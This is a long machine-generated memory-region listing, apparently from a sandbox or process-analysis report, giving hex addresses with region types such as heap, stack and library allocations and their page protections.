trusted library allocation
page read and write
9ECB000
trusted library allocation
page read and write
490C000
trusted library allocation
page read and write
475B000
trusted library allocation
page read and write
2727000
trusted library allocation
page read and write
7FC08000
trusted library allocation
page execute and read and write
6C4F7000
unkown
page readonly
2FE5000
trusted library allocation
page read and write
12AB000
trusted library allocation
page execute and read and write
2FE9000
trusted library allocation
page read and write
7D9E000
stack
page read and write
9DA000
trusted library allocation
page execute and read and write
410F000
trusted library allocation
page read and write
303D000
trusted library allocation
page read and write
41A9000
trusted library allocation
page read and write
F9C000
stack
page read and write
5320000
trusted library allocation
page read and write
3F4E000
heap
page read and write
6D8D000
stack
page read and write
FF7000
heap
page read and write
E07000
heap
page read and write
2FC0000
heap
page read and write
4002000
trusted library allocation
page read and write
9949000
heap
page read and write
2F55000
trusted library allocation
page read and write
FB8000
heap
page read and write
116D000
stack
page read and write
866C000
stack
page read and write
2F54000
trusted library allocation
page read and write
283C000
heap
page read and write
2FAF000
trusted library allocation
page read and write
60FC000
heap
page read and write
A392000
trusted library allocation
page read and write
300B000
trusted library allocation
page read and write
621F000
heap
page read and write
BAE000
stack
page read and write
86EE000
stack
page read and write
56F0000
trusted library allocation
page read and write
477B000
trusted library allocation
page read and write
59E5000
heap
page read and write
5B34000
heap
page read and write
2F84000
trusted library allocation
page read and write
745D000
stack
page read and write
3EC4000
heap
page read and write
2F53000
trusted library allocation
page read and write
F10000
trusted library allocation
page read and write
D22000
trusted library allocation
page read and write
58B0000
trusted library allocation
page execute and read and write
2D23000
trusted library allocation
page read and write
4170000
trusted library allocation
page read and write
5370000
trusted library allocation
page read and write
2FB7000
trusted library allocation
page read and write
A431000
trusted library allocation
page read and write
D50000
heap
page read and write
2DBF000
stack
page read and write
2D5E000
stack
page read and write
26BD000
stack
page read and write
6110000
heap
page read and write
30F6000
trusted library allocation
page read and write
8C1D000
stack
page read and write
3027000
trusted library allocation
page read and write
38C1000
heap
page read and write
6C526000
unkown
page readonly
7149000
stack
page read and write
5B2D000
stack
page read and write
77AB000
heap
page read and write
865D000
stack
page read and write
30C4000
trusted library allocation
page read and write
5530000
heap
page execute and read and write
2FC9000
trusted library allocation
page read and write
473B000
trusted library allocation
page read and write
9965000
heap
page read and write
46BC000
trusted library allocation
page read and write
5374000
trusted library allocation
page read and write
1174000
trusted library allocation
page read and write
38BD000
heap
page read and write
4043000
heap
page read and write
46AB000
trusted library allocation
page read and write
FDC000
stack
page read and write
3073000
trusted library allocation
page read and write
5357000
trusted library allocation
page read and write
30E1000
trusted library allocation
page read and write
3059000
trusted library allocation
page read and write
4735000
heap
page read and write
3003000
trusted library allocation
page read and write
A348000
trusted library allocation
page read and write
3AA5000
heap
page read and write
765E000
stack
page read and write
38B8000
heap
page read and write
304F000
trusted library allocation
page read and write
6F6000
heap
page read and write
2707000
trusted library allocation
page read and write
6219000
heap
page read and write
81EF000
stack
page read and write
9B7E000
stack
page read and write
600000
heap
page read and write
2BCB000
trusted library allocation
page read and write
43A000
stack
page read and write
4849000
trusted library allocation
page read and write
83FC000
heap
page read and write
9EFB000
trusted library allocation
page read and write
7060000
heap
page read and write
53D0000
heap
page read and write
3037000
trusted library allocation
page read and write
FF0000
heap
page read and write
6F3C000
stack
page read and write
46F8000
trusted library allocation
page read and write
7B9E000
stack
page read and write
4D30000
trusted library allocation
page read and write
2807000
trusted library allocation
page read and write
8338000
heap
page read and write
7862000
heap
page read and write
4229000
trusted library allocation
page read and write
41C4000
heap
page read and write
26CF000
trusted library allocation
page read and write
2BED000
stack
page read and write
520F000
heap
page read and write
27C5000
trusted library allocation
page read and write
4C9A000
heap
page read and write
24A0000
heap
page read and write
6DAC000
stack
page read and write
2F34000
trusted library allocation
page read and write
301B000
trusted library allocation
page read and write
4ACC000
heap
page read and write
4800000
trusted library allocation
page read and write
1020000
trusted library allocation
page read and write
4E69000
heap
page read and write
294D000
trusted library allocation
page read and write
701E000
stack
page read and write
4996000
trusted library allocation
page read and write
2CE0000
trusted library allocation
page read and write
4FD0000
trusted library allocation
page execute and read and write
47BC000
trusted library allocation
page read and write
3B6A000
heap
page read and write
6F4A000
stack
page read and write
2EED000
trusted library allocation
page read and write
50C0000
trusted library allocation
page execute and read and write
7610000
heap
page read and write
F96000
heap
page read and write
3BD8000
trusted library allocation
page read and write
2E40000
heap
page read and write
376E000
trusted library allocation
page read and write
76A8000
trusted library allocation
page read and write
3F68000
heap
page read and write
2EB7000
trusted library allocation
page read and write
2530000
trusted library allocation
page read and write
2ECB000
trusted library allocation
page read and write
4735000
heap
page read and write
135C000
heap
page read and write
86DF000
heap
page read and write
2BCF000
stack
page read and write
46C5000
trusted library allocation
page read and write
3900000
heap
page read and write
2E00000
trusted library allocation
page read and write
481B000
trusted library allocation
page read and write
A127000
trusted library allocation
page read and write
3FAC000
heap
page read and write
2EC9000
trusted library allocation
page read and write
3F47000
heap
page read and write
D85000
heap
page read and write
2476000
trusted library allocation
page read and write
3FEF000
heap
page read and write
2721000
trusted library allocation
page read and write
FA4000
heap
page read and write
26F5000
trusted library allocation
page read and write
2B54000
heap
page read and write
5610000
heap
page execute and read and write
5036000
heap
page read and write
2B91000
trusted library allocation
page read and write
52A3000
heap
page read and write
4169000
trusted library allocation
page read and write
3049000
trusted library allocation
page read and write
828A000
trusted library allocation
page read and write
2920000
trusted library allocation
page read and write
2F97000
trusted library allocation
page read and write
7B40000
trusted library allocation
page read and write
512C000
stack
page read and write
6C480000
unkown
page readonly
5160000
trusted library allocation
page read and write
3043000
trusted library allocation
page read and write
BAD000
trusted library allocation
page read and write
3F91000
heap
page read and write
5F66000
heap
page read and write
A024000
trusted library allocation
page read and write
3039000
trusted library allocation
page read and write
3BB8000
trusted library allocation
page read and write
9F7000
trusted library allocation
page execute and read and write
4E2E000
stack
page read and write
5640000
heap
page read and write
6DAE000
stack
page read and write
302B000
trusted library allocation
page read and write
3009000
trusted library allocation
page read and write
4442000
heap
page read and write
598C000
stack
page read and write
3071000
trusted library allocation
page read and write
3122000
trusted library allocation
page read and write
101F000
heap
page read and write
6C090000
unkown
page readonly
3F4E000
heap
page read and write
4E68000
heap
page read and write
7B70000
trusted library allocation
page read and write
5D2E000
stack
page read and write
400000
remote allocation
page execute and read and write
4982000
heap
page read and write
5841000
trusted library allocation
page read and write
9D3E000
stack
page read and write
7DDC000
stack
page read and write
7964000
heap
page read and write
A30C000
trusted library allocation
page read and write
2FF1000
trusted library allocation
page read and write
3420000
heap
page read and write
27E9000
trusted library allocation
page read and write
944000
trusted library allocation
page read and write
537000
stack
page read and write
847E000
stack
page read and write
2ECF000
trusted library allocation
page read and write
4B4F000
heap
page read and write
F7E000
heap
page read and write
2F6D000
trusted library allocation
page read and write
26A6000
trusted library allocation
page read and write
3428000
heap
page read and write
2BF0000
heap
page read and write
A424000
trusted library allocation
page read and write
7926000
heap
page read and write
101F000
heap
page read and write
4354000
heap
page read and write
8B2D000
heap
page read and write
3AA1000
heap
page read and write
7850000
heap
page read and write
3093000
trusted library allocation
page read and write
C6C7000
trusted library allocation
page read and write
6210000
heap
page read and write
9F99000
trusted library allocation
page read and write
3F54000
heap
page read and write
26F7000
trusted library allocation
page read and write
3AA2000
heap
page read and write
2F87000
trusted library allocation
page read and write
950000
heap
page read and write
D26000
trusted library allocation
page execute and read and write
760E000
stack
page read and write
2B3C000
heap
page read and write
3365000
trusted library allocation
page execute and read and write
6C627000
unkown
page read and write
3055000
trusted library allocation
page read and write
5470000
heap
page read and write
38E2000
heap
page read and write
A2CB000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
2EC1000
trusted library allocation
page read and write
3077000
trusted library allocation
page read and write
3AA6000
heap
page read and write
745D000
heap
page read and write
9EB000
stack
page read and write
FFF000
heap
page read and write
2ECB000
trusted library allocation
page read and write
5ED1000
heap
page read and write
8D8D000
stack
page read and write
1180000
trusted library allocation
page read and write
11F1000
heap
page read and write
81A0000
heap
page read and write
769F000
stack
page read and write
9B0000
trusted library allocation
page read and write
534E000
trusted library allocation
page read and write
2FF1000
trusted library allocation
page read and write
D97000
heap
page read and write
71E000
unkown
page read and write
4E50000
heap
page execute and read and write
3F97000
heap
page read and write
4D21000
heap
page read and write
6C62A000
unkown
page readonly
FE6000
trusted library allocation
page execute and read and write
3EC1000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
2E4C000
heap
page read and write
2C7E000
stack
page read and write
2C20000
heap
page read and write
97BE000
stack
page read and write
5680000
heap
page read and write
110E000
heap
page read and write
77F5000
heap
page read and write
748E000
stack
page read and write
7448000
heap
page read and write
9EA1000
trusted library allocation
page read and write
9E9000
heap
page read and write
3334000
trusted library allocation
page read and write
14B0000
heap
page read and write
6010000
heap
page read and write
48B7000
trusted library allocation
page read and write
4D40000
trusted library allocation
page execute and read and write
30F8000
trusted library allocation
page read and write
2F50000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
1145000
heap
page read and write
26C1000
trusted library allocation
page read and write
2733000
trusted library allocation
page read and write
306D000
trusted library allocation
page read and write
4441000
heap
page read and write
4837000
heap
page read and write
28ED000
heap
page read and write
52C0000
trusted library allocation
page read and write
68A0000
heap
page read and write
BD0000
trusted library allocation
page read and write
267D000
stack
page read and write
25DE000
trusted library allocation
page read and write
4737000
trusted library allocation
page read and write
9EF4000
trusted library allocation
page read and write
517D000
stack
page read and write
1423000
trusted library allocation
page read and write
2757000
trusted library allocation
page read and write
14B9000
heap
page read and write
3B5000
unkown
page read and write
4F30000
trusted library allocation
page read and write
2FBB000
trusted library allocation
page read and write
5FC0000
heap
page read and write
7189000
heap
page read and write
6C3E4000
unkown
page readonly
9947000
heap
page read and write
FB4000
heap
page read and write
2D4D000
stack
page read and write
3DD7000
trusted library allocation
page read and write
51C6000
trusted library allocation
page read and write
535A000
trusted library allocation
page read and write
2DFD000
trusted library allocation
page read and write
4937000
trusted library allocation
page read and write
25C0000
heap
page read and write
B85000
heap
page read and write
7670000
trusted library allocation
page read and write
731E000
stack
page read and write
4E5C000
stack
page read and write
276D000
trusted library allocation
page read and write
1192000
trusted library allocation
page read and write
2EE0000
heap
page readonly
8B06000
heap
page read and write
3FD5000
heap
page read and write
877D000
heap
page read and write
27E7000
trusted library allocation
page read and write
F9C000
heap
page read and write
7630000
trusted library allocation
page read and write
3EC5000
heap
page read and write
73B0000
heap
page read and write
6AAE000
stack
page read and write
718D000
heap
page read and write
DA9000
heap
page read and write
6800000
trusted library allocation
page read and write
26F1000
trusted library allocation
page read and write
732E000
stack
page read and write
2703000
trusted library allocation
page read and write
FAC000
heap
page read and write
5280000
trusted library allocation
page read and write
5484000
trusted library allocation
page read and write
3017000
trusted library allocation
page read and write
E3A000
stack
page read and write
76F0000
trusted library allocation
page read and write
4C6C000
stack
page read and write
4B63000
heap
page read and write
6C3B9000
unkown
page read and write
27DF000
trusted library allocation
page read and write
2CA3000
trusted library allocation
page read and write
74AE000
stack
page read and write
3AF000
unkown
page write copy
3AAF000
heap
page read and write
2FA3000
trusted library allocation
page read and write
406D000
trusted library allocation
page read and write
9E80000
trusted library section
page read and write
2E30000
trusted library allocation
page read and write
1034000
trusted library allocation
page read and write
3290000
heap
page read and write
738E000
stack
page read and write
4CB3000
trusted library allocation
page read and write
5380000
trusted library allocation
page read and write
46E7000
trusted library allocation
page read and write
3903000
heap
page read and write
F20000
heap
page read and write
2FDF000
trusted library allocation
page read and write
30DF000
trusted library allocation
page read and write
5690000
trusted library allocation
page read and write
27D1000
trusted library allocation
page read and write
303F000
trusted library allocation
page read and write
2F80000
trusted library allocation
page read and write
7640000
trusted library allocation
page execute and read and write
8190000
heap
page read and write
2EE0000
heap
page read and write
4B7A000
trusted library allocation
page read and write
3047000
trusted library allocation
page read and write
2DF1000
trusted library allocation
page read and write
33C7000
heap
page read and write
A2FB000
trusted library allocation
page read and write
4C90000
heap
page execute and read and write
4D40000
heap
page read and write
8859000
heap
page read and write
4AD4000
trusted library allocation
page read and write
FB4000
heap
page read and write
6290000
trusted library allocation
page execute and read and write
4735000
heap
page read and write
2E60000
trusted library allocation
page read and write
759E000
stack
page read and write
2FC3000
trusted library allocation
page read and write
5301000
trusted library allocation
page read and write
755F000
stack
page read and write
30B8000
trusted library allocation
page read and write
F99000
heap
page read and write
2811000
trusted library allocation
page read and write
38B9000
heap
page read and write
8720000
trusted library allocation
page read and write
30DB000
trusted library allocation
page read and write
8870000
heap
page read and write
76D1000
heap
page read and write
5EE7000
trusted library allocation
page read and write
46B1000
heap
page read and write
2946000
trusted library allocation
page read and write
FCF000
heap
page read and write
26E7000
trusted library allocation
page read and write
FAB000
heap
page read and write
878D000
heap
page read and write
9BE000
heap
page read and write
4C59000
heap
page read and write
D8A000
heap
page read and write
275B000
trusted library allocation
page read and write
4D3D000
trusted library allocation
page read and write
75AE000
stack
page read and write
2761000
trusted library allocation
page read and write
4289000
trusted library allocation
page read and write
6EF2000
heap
page read and write
94D000
trusted library allocation
page execute and read and write
2E40000
trusted library section
page read and write
6C061000
unkown
page execute read
30CB000
trusted library allocation
page read and write
7A20000
heap
page read and write
101C000
heap
page read and write
2799000
trusted library allocation
page read and write
9EAD000
trusted library allocation
page read and write
305D000
trusted library allocation
page read and write
885D000
heap
page read and write
6FEE000
stack
page read and write
F58000
heap
page read and write
4CDC000
heap
page read and write
2EC0000
trusted library allocation
page read and write
1397000
heap
page read and write
105E000
heap
page read and write
469C000
trusted library allocation
page read and write
1062000
trusted library allocation
page read and write
B80000
trusted library allocation
page read and write
542A000
trusted library allocation
page read and write
2F47000
trusted library allocation
page read and write
7199000
heap
page read and write
6E0E000
stack
page read and write
28B2000
trusted library allocation
page read and write
8BA0000
trusted library allocation
page read and write
4F3B000
stack
page read and write
8404000
heap
page read and write
80FD000
stack
page read and write
4CF0000
trusted library section
page read and write
43A1000
trusted library allocation
page read and write
2779000
trusted library allocation
page read and write
2D30000
heap
page read and write
3F5B000
heap
page read and write
5EF2000
heap
page read and write
2E20000
trusted library allocation
page read and write
277F000
trusted library allocation
page read and write
2990000
heap
page read and write
3A91000
heap
page read and write
8710000
trusted library allocation
page read and write
72DE000
stack
page read and write
4420000
heap
page read and write
2E40000
trusted library allocation
page read and write
73CE000
stack
page read and write
30BB000
trusted library allocation
page read and write
7A1E000
stack
page read and write
9B0000
heap
page read and write
303D000
trusted library allocation
page read and write
82E0000
trusted library allocation
page read and write
44AF000
heap
page read and write
5300000
heap
page read and write
2F52000
trusted library allocation
page read and write
4B70000
trusted library allocation
page read and write
27A0000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
4A8A000
heap
page read and write
7BAE000
stack
page read and write
8340000
heap
page read and write
1436000
trusted library allocation
page execute and read and write
29B0000
heap
page read and write
6190000
heap
page read and write
119A000
trusted library allocation
page execute and read and write
4808000
trusted library allocation
page read and write
2E04000
trusted library allocation
page read and write
6BBE000
stack
page read and write
5F94000
heap
page read and write
9F34000
trusted library allocation
page read and write
4B6D000
heap
page read and write
262B000
trusted library allocation
page read and write
D2A000
trusted library allocation
page execute and read and write
3FE8000
heap
page read and write
2FCB000
trusted library allocation
page read and write
A046000
trusted library allocation
page read and write
4101000
heap
page read and write
46B1000
heap
page read and write
4841000
trusted library allocation
page read and write
5F72000
heap
page read and write
76DD000
heap
page read and write
3B6000
unkown
page readonly
3B75000
heap
page read and write
6098000
heap
page read and write
5EB0000
heap
page read and write
F96000
heap
page read and write
5630000
trusted library allocation
page read and write
9F2000
trusted library allocation
page read and write
5618000
trusted library allocation
page read and write
86AE000
stack
page read and write
FD0000
heap
page read and write
2F48000
trusted library allocation
page read and write
2FC1000
trusted library allocation
page read and write
5480000
trusted library allocation
page read and write
2F67000
trusted library allocation
page read and write
3C83000
trusted library allocation
page read and write
9EF000
heap
page read and write
512E000
stack
page read and write
3069000
trusted library allocation
page read and write
100F000
heap
page read and write
6C181000
unkown
page execute read
86D0000
heap
page read and write
A491000
trusted library allocation
page read and write
1447000
trusted library allocation
page execute and read and write
27BF000
trusted library allocation
page read and write
2729000
trusted library allocation
page read and write
738E000
stack
page read and write
389F000
trusted library allocation
page read and write
7D7E000
stack
page read and write
26DF000
trusted library allocation
page read and write
DF5000
stack
page read and write
2E90000
trusted library allocation
page read and write
479C000
stack
page read and write
2FAC000
trusted library allocation
page read and write
2EFE000
trusted library allocation
page read and write
2FE1000
trusted library allocation
page read and write
A1000
unkown
page execute read
2FE7000
trusted library allocation
page read and write
483D000
heap
page read and write
46EE000
stack
page read and write
6C0F5000
unkown
page readonly
2FB3000
trusted library allocation
page read and write
E3D000
heap
page read and write
5A00000
trusted library allocation
page execute and read and write
4E88000
heap
page read and write
8856000
heap
page read and write
4C7E000
stack
page read and write
33A0000
trusted library allocation
page execute and read and write
FAA000
heap
page read and write
2FF3000
trusted library allocation
page read and write
2FBF000
trusted library allocation
page read and write
52A0000
heap
page read and write
2960000
trusted library allocation
page read and write
2FBB000
trusted library allocation
page read and write
5E56000
heap
page read and write
3AAA000
heap
page read and write
27E5000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
6C493000
unkown
page readonly
1050000
trusted library allocation
page read and write
D30000
heap
page read and write
F35000
heap
page read and write
73E0000
heap
page read and write
2801000
trusted library allocation
page read and write
4CC4000
trusted library allocation
page read and write
83E2000
trusted library allocation
page read and write
6FAE000
stack
page read and write
682E000
stack
page read and write
F90000
heap
page read and write
72C1000
trusted library allocation
page read and write
4D00000
trusted library allocation
page read and write
3FE2000
heap
page read and write
9F87000
trusted library allocation
page read and write
2F73000
trusted library allocation
page read and write
3059000
trusted library allocation
page read and write
1009000
heap
page read and write
3017000
trusted library allocation
page read and write
548F000
stack
page read and write
2AC0000
trusted library allocation
page read and write
28A4000
trusted library allocation
page read and write
27E3000
trusted library allocation
page read and write
401C000
trusted library allocation
page read and write
2F33000
trusted library allocation
page read and write
272F000
trusted library allocation
page read and write
30AF000
trusted library allocation
page read and write
53A0000
trusted library allocation
page read and write
50EE000
stack
page read and write
4023000
trusted library allocation
page read and write
3900000
heap
page read and write
4DF0000
heap
page read and write
FAC000
heap
page read and write
3EFC000
heap
page read and write
950000
trusted library allocation
page read and write
A378000
trusted library allocation
page read and write
6420000
trusted library allocation
page read and write
144B000
trusted library allocation
page execute and read and write
818D000
stack
page read and write
7380000
heap
page execute and read and write
4B73000
trusted library allocation
page read and write
940000
trusted library allocation
page read and write
F90000
heap
page read and write
1286000
trusted library allocation
page execute and read and write
4CA0000
trusted library allocation
page execute and read and write
30AB000
trusted library allocation
page read and write
3055000
trusted library allocation
page read and write
D32000
trusted library allocation
page read and write
2D60000
heap
page execute and read and write
5910000
heap
page read and write
30C5000
trusted library allocation
page read and write
620B000
heap
page read and write
5320000
heap
page read and write
4830000
trusted library allocation
page read and write
2F5C000
stack
page read and write
1359000
heap
page read and write
A358000
trusted library allocation
page read and write
634000
heap
page read and write
A406000
trusted library allocation
page read and write
1200000
heap
page read and write
2E60000
heap
page read and write
2E79000
heap
page read and write
705E000
stack
page read and write
6018000
heap
page read and write
5861000
trusted library allocation
page read and write
595000
heap
page read and write
4BD8000
trusted library allocation
page read and write
4E25000
heap
page read and write
278D000
trusted library allocation
page read and write
190000
unkown
page readonly
608C000
heap
page read and write
3B5E000
heap
page read and write
A373000
trusted library allocation
page read and write
77DE000
stack
page read and write
745B000
heap
page read and write
3053000
trusted library allocation
page read and write
D3B000
trusted library allocation
page execute and read and write
47E7000
trusted library allocation
page read and write
2737000
trusted library allocation
page read and write
43BA000
heap
page read and write
262E000
trusted library allocation
page read and write
2E28000
trusted library allocation
page read and write
79DA000
trusted library allocation
page read and write
2F81000
trusted library allocation
page read and write
101A000
heap
page read and write
837E000
stack
page read and write
1020000
trusted library allocation
page read and write
28C0000
heap
page read and write
30A1000
trusted library allocation
page read and write
4EEC000
heap
page read and write
27F7000
trusted library allocation
page read and write
4DCD000
trusted library allocation
page read and write
3ED4000
heap
page read and write
7DEC000
stack
page read and write
827E000
stack
page read and write
2FEF000
trusted library allocation
page read and write
5364000
trusted library allocation
page read and write
D0D000
trusted library allocation
page execute and read and write
2E89000
trusted library allocation
page read and write
31BF000
stack
page read and write
3F39000
heap
page read and write
143A000
trusted library allocation
page execute and read and write
E80000
heap
page read and write
FB4000
heap
page read and write
1033000
trusted library allocation
page execute and read and write
11AB000
trusted library allocation
page execute and read and write
B55000
heap
page read and write
2655000
trusted library allocation
page read and write
3E90000
heap
page read and write
574B000
trusted library allocation
page read and write
5F13000
heap
page read and write
FC8000
heap
page read and write
303B000
trusted library allocation
page read and write
2E7C000
trusted library allocation
page read and write
6C48F000
unkown
page read and write
9E4000
heap
page read and write
2E10000
heap
page read and write
2FB9000
trusted library allocation
page read and write
144E000
stack
page read and write
2FAF000
trusted library allocation
page read and write
120000
unkown
page readonly
53B0000
heap
page read and write
330F000
stack
page read and write
FA4000
heap
page read and write
47C8000
trusted library allocation
page read and write
2B30000
heap
page read and write
FAA000
heap
page read and write
580000
heap
page read and write
3E61000
trusted library allocation
page read and write
60E000
heap
page read and write
73E000
unkown
page read and write
7183000
heap
page read and write
FAA000
heap
page read and write
5A20000
heap
page read and write
76A0000
heap
page read and write
2F7E000
stack
page read and write
49C4000
heap
page read and write
3051000
trusted library allocation
page read and write
307D000
trusted library allocation
page read and write
26F3000
trusted library allocation
page read and write
2FCF000
trusted library allocation
page read and write
2E32000
trusted library allocation
page read and write
A01C000
trusted library allocation
page read and write
4B0E000
heap
page read and write
D60000
heap
page read and write
BDF000
trusted library allocation
page read and write
6C48D000
unkown
page readonly
5636000
trusted library allocation
page read and write
3025000
trusted library allocation
page read and write
488000
unkown
page read and write
2ED7000
trusted library allocation
page read and write
2E68000
heap
page read and write
750C000
stack
page read and write
8330000
heap
page read and write
2FE3000
trusted library allocation
page read and write
2A40000
heap
page read and write
FC0000
trusted library allocation
page read and write
5F21000
heap
page read and write
535D000
trusted library allocation
page read and write
305B000
trusted library allocation
page read and write
2E21000
trusted library allocation
page read and write
A41C000
trusted library allocation
page read and write
894C000
stack
page read and write
FF1000
heap
page read and write
FB4000
heap
page read and write
2BE5000
heap
page read and write
3023000
trusted library allocation
page read and write
400D000
heap
page read and write
2AA0000
trusted library allocation
page read and write
2C67000
trusted library allocation
page read and write
5FB0000
heap
page read and write
2FDF000
trusted library allocation
page read and write
4A00000
trusted library allocation
page execute and read and write
7390000
trusted library allocation
page read and write
2EC5000
trusted library allocation
page read and write
FB4000
heap
page read and write
1460000
trusted library allocation
page read and write
4017000
trusted library allocation
page read and write
3FCD000
heap
page read and write
6214000
heap
page read and write
1144000
heap
page read and write
6C6C000
stack
page read and write
52A0000
heap
page read and write
52E7000
trusted library allocation
page read and write
4083000
trusted library allocation
page read and write
2E93000
trusted library allocation
page read and write
11D0000
heap
page read and write
250E000
stack
page read and write
46E4000
trusted library allocation
page read and write
3E48000
heap
page read and write
58AB000
stack
page read and write
7FBF0000
trusted library allocation
page execute and read and write
3900000
trusted library allocation
page read and write
3027000
trusted library allocation
page read and write
280B000
trusted library allocation
page read and write
B3E000
stack
page read and write
14AE000
stack
page read and write
2FD5000
trusted library allocation
page read and write
38BD000
heap
page read and write
3FC7000
heap
page read and write
3F76000
heap
page read and write
2F45000
trusted library allocation
page read and write
5330000
trusted library allocation
page execute and read and write
4723000
trusted library allocation
page read and write
2E60000
heap
page read and write
5370000
trusted library allocation
page read and write
A350000
trusted library allocation
page read and write
6D2E000
stack
page read and write
3837000
trusted library allocation
page read and write
2FEF000
trusted library allocation
page read and write
2F59000
trusted library allocation
page read and write
2E69000
trusted library allocation
page read and write
2FC5000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
2F6D000
trusted library allocation
page read and write
FA4000
heap
page read and write
2FDD000
trusted library allocation
page read and write
880000
heap
page read and write
27A3000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
1040000
trusted library allocation
page read and write
735D000
stack
page read and write
12C0000
trusted library allocation
page read and write
339F000
stack
page read and write
EF7000
stack
page read and write
9999000
heap
page read and write
2749000
trusted library allocation
page read and write
6E8D000
stack
page read and write
52E0000
trusted library allocation
page read and write
30B7000
trusted library allocation
page read and write
27C9000
trusted library allocation
page read and write
B80000
heap
page read and write
5100000
heap
page read and write
3AA2000
heap
page read and write
650D000
stack
page read and write
9A0000
heap
page read and write
3410000
heap
page execute and read and write
6C6C9000
unkown
page read and write
30F3000
trusted library allocation
page read and write
2495000
trusted library allocation
page read and write
280D000
trusted library allocation
page read and write
3039000
trusted library allocation
page read and write
627000
heap
page read and write
FC8000
heap
page read and write
6C107000
unkown
page read and write
299D000
stack
page read and write
3071000
trusted library allocation
page read and write
74F2000
trusted library allocation
page read and write
FB4000
heap
page read and write
FF7000
heap
page read and write
FCD000
trusted library allocation
page execute and read and write
7000000
heap
page read and write
5F00000
trusted library allocation
page read and write
2B75000
heap
page read and write
2A9F000
unkown
page read and write
3091000
trusted library allocation
page read and write
A53C000
trusted library allocation
page read and write
27A4000
trusted library allocation
page read and write
FC4000
trusted library allocation
page read and write
306B000
trusted library allocation
page read and write
D50000
heap
page read and write
9F0000
heap
page read and write
77F3000
heap
page read and write
2460000
trusted library allocation
page read and write
483B000
trusted library allocation
page read and write
2F61000
trusted library allocation
page read and write
2A2F000
stack
page read and write
30D9000
trusted library allocation
page read and write
2B52000
heap
page read and write
A315000
trusted library allocation
page read and write
2FB7000
trusted library allocation
page read and write
85EB000
trusted library allocation
page read and write
4CB0000
trusted library allocation
page read and write
3045000
trusted library allocation
page read and write
2ED5000
trusted library allocation
page read and write
518E000
stack
page read and write
41C5000
heap
page read and write
BA1000
trusted library allocation
page read and write
531E000
stack
page read and write
EF7000
stack
page read and write
7FBF000
stack
page read and write
28C7000
heap
page read and write
823D000
stack
page read and write
9FFC000
trusted library allocation
page read and write
640B000
stack
page read and write
2EF6000
trusted library allocation
page read and write
71DF000
stack
page read and write
FE7000
heap
page read and write
471B000
trusted library allocation
page read and write
840F000
heap
page read and write
9F78000
trusted library allocation
page read and write
6C3BE000
unkown
page readonly
614C000
heap
page read and write
3F26000
heap
page read and write
2FC3000
trusted library allocation
page read and write
7510000
trusted library allocation
page execute and read and write
2EAE000
trusted library allocation
page read and write
794C000
heap
page read and write
13BF000
heap
page read and write
11A7000
trusted library allocation
page execute and read and write
2E7C000
heap
page read and write
6C353000
unkown
page readonly
3035000
trusted library allocation
page read and write
5640000
trusted library allocation
page execute and read and write
F8E000
heap
page read and write
30DD000
trusted library allocation
page read and write
9100000
heap
page read and write
6EEE000
stack
page read and write
49F0000
heap
page read and write
51CE000
stack
page read and write
125C000
stack
page read and write
2970000
trusted library allocation
page read and write
4000000
heap
page read and write
4983000
heap
page read and write
27C1000
trusted library allocation
page read and write
66AE000
stack
page read and write
4430000
heap
page read and write
5D68000
heap
page read and write
38B5000
heap
page read and write
3902000
heap
page read and write
2F94000
trusted library allocation
page read and write
BEA1000
trusted library allocation
page read and write
2F79000
trusted library allocation
page read and write
3025000
trusted library allocation
page read and write
3047000
trusted library allocation
page read and write
2E44000
trusted library allocation
page read and write
2EFE000
trusted library allocation
page read and write
275D000
trusted library allocation
page read and write
77DF000
heap
page read and write
6262000
heap
page read and write
35F1000
trusted library allocation
page read and write
272B000
trusted library allocation
page read and write
2C75000
trusted library allocation
page read and write
972000
trusted library allocation
page read and write
3087000
trusted library allocation
page read and write
778E000
stack
page read and write
2F67000
trusted library allocation
page read and write
4D51000
trusted library allocation
page read and write
3AA2000
heap
page read and write
5F15000
heap
page read and write
761F000
stack
page read and write
7980000
trusted library allocation
page execute and read and write
274D000
trusted library allocation
page read and write
25F1000
trusted library allocation
page read and write
2985000
trusted library allocation
page read and write
6C10E000
unkown
page write copy
A1000
unkown
page execute read
2FF5000
trusted library allocation
page read and write
1007000
trusted library allocation
page execute and read and write
265D000
trusted library allocation
page read and write
40D6000
trusted library allocation
page read and write
FA1000
heap
page read and write
3150000
heap
page read and write
6236000
heap
page read and write
2F97000
trusted library allocation
page read and write
2F75000
trusted library allocation
page read and write
2F5D000
trusted library allocation
page read and write
5334000
trusted library allocation
page read and write
148C000
stack
page read and write
87E000
stack
page read and write
887E000
stack
page read and write
504F000
stack
page read and write
3415000
heap
page execute and read and write
3049000
trusted library allocation
page read and write
F9D000
heap
page read and write
6C091000
unkown
page execute read
A0000
unkown
page readonly
2814000
trusted library allocation
page read and write
428B000
heap
page read and write
79E0000
trusted library allocation
page read and write
2E7D000
trusted library allocation
page execute and read and write
6BAE000
stack
page read and write
D87000
heap
page read and write
9D2000
trusted library allocation
page read and write
1490000
heap
page read and write
3B6000
unkown
page readonly
A36B000
trusted library allocation
page read and write
5D79000
trusted library allocation
page read and write
9EDF000
trusted library allocation
page read and write
4C16000
heap
page read and write
4A06000
heap
page read and write
97B000
trusted library allocation
page execute and read and write
3067000
trusted library allocation
page read and write
3033000
trusted library allocation
page read and write
4D27000
heap
page read and write
7FFD000
stack
page read and write
83C0000
trusted library allocation
page read and write
F8F000
heap
page read and write
30B9000
trusted library allocation
page read and write
578D000
stack
page read and write
899E000
stack
page read and write
A2E6000
trusted library allocation
page read and write
4F36000
trusted library allocation
page read and write
4C20000
trusted library allocation
page read and write
5EFB000
trusted library allocation
page read and write
82B0000
trusted library allocation
page read and write
335A000
trusted library allocation
page execute and read and write
96BD000
stack
page read and write
A0000
unkown
page readonly
59F6000
trusted library allocation
page read and write
777D000
heap
page read and write
4140000
heap
page read and write
3F26000
heap
page read and write
2B00000
heap
page read and write
76EF000
trusted library allocation
page read and write
6C492000
unkown
page write copy
311D000
trusted library allocation
page read and write
9F15000
trusted library allocation
page read and write
2F77000
trusted library allocation
page read and write
110E000
stack
page read and write
1432000
trusted library allocation
page read and write
101C000
heap
page read and write
D13000
trusted library allocation
page read and write
122000
unkown
page readonly
44A3000
heap
page read and write
